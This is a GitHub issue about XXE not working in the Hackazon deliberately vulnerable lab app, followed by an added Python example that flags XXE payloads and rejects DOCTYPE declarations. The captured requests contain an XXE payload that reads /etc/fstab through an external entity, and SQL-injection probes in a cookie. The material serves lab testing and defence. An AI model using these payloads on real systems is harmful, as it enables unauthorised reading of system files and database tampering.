
Issues with XXE

Open artsalmon opened this issue 5 years ago • 0 comments

XXE vulnerabilities seem not to be functioning.

I have verified that XXE is enabled in the vulnerabilities.md file, and I have also logged in to the admin page and ensured that there are pages on which the XXE vulnerability is enabled. I turned it on in every location that I could, just in case. I verified the PHP files in the config location to ensure that XXE was set to true for the location I needed. I enabled XXE for the Cart/View area.

I set up Burp to intercept the HTTP GET requests, and I captured the code below.

---ORIGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the code to include the XML example code from the vulnerability description.

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get an HTML 400 return error.

I have tried clearing the cache, I have tried doing this in a VM with no other content, and I ensured that Firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?

artsalmon, Apr 08 '20 23:04
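The request quoted in the issue is a useful specimen for the defender's side of the same question: what does an XXE attempt look like on the wire, and how does a service refuse it? The following is an added example, not Hackazon code and not written by the issue author. It inspects a raw HTTP request for the markers that make a payload worth flagging (an inline DOCTYPE, an entity declared with SYSTEM or PUBLIC, a body sent on a GET, a body with no Content-Length or Transfer-Encoding header) and wraps the standard-library XML parser so that any DOCTYPE is rejected before parsing. The sample request is constructed from the one in the issue with the display quotes removed and the cookie shortened; the host address and session id are placeholders.

```python
"""
Added example (not Hackazon code, not from the issue author): flag XXE-style
payloads in captured HTTP requests, and parse XML while refusing any DOCTYPE.
"""
import re
import xml.etree.ElementTree as ET

# Markers of an inline DTD and of entities that point outside the document.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)

# Constructed sample, modelled on the issue's modified request. The host and
# PHPSESSID are placeholders; the cookie list is truncated for readability.
SAMPLE_REQUEST = (
    "GET /success.txt HTTP/1.1\r\n"
    "Host: 192.168.198.145\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) "
    "Gecko/20100101 Firefox/74.0\r\n"
    "Accept: */*\r\n"
    "Connection: close\r\n"
    "Content-Type: text/xml\r\n"
    "Referer: http://192.168.198.145/cart/view\r\n"
    "Cookie: visited_products=%2C208%2C101; PHPSESSID=PLACEHOLDER\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>\r\n'
    '<!DOCTYPE roottag [<!ENTITY goodies SYSTEM "file:///etc/fstab">]>\r\n'
    "<roottag>&goodies;</roottag>\r\n"
)


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def xxe_indicators(raw: str):
    """Return the findings that make this request worth a closer look."""
    method, _target, headers, body = parse_raw_request(raw)
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("inline-doctype")
    if EXTERNAL_ENTITY_RE.search(body):
        findings.append("external-entity")
    if PARAM_ENTITY_RE.search(body):
        findings.append("parameter-entity")
    if body.strip() and method in ("GET", "HEAD"):
        # A body on GET is legal but unusual, and many stacks never read it.
        findings.append("body-on-" + method.lower())
    if body.strip() and not ({"content-length", "transfer-encoding"} & set(headers)):
        # Without length or chunking the server has no framing for the body.
        findings.append("body-without-length")
    return findings


def safe_parse(xml_text: str) -> ET.Element:
    """Parse XML but refuse any DOCTYPE, which removes the entity vector."""
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE declarations are not accepted")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(xxe_indicators(SAMPLE_REQUEST))
```

Rejecting every DOCTYPE is the blunt fix and is what most hardening guides recommend for services that only ever consume plain XML; a service that genuinely needs a DTD should instead disable external entity resolution in its parser. The framing checks (body on a GET, no Content-Length) are also the first thing to look at when a test request returns 400 before the XML is ever parsed.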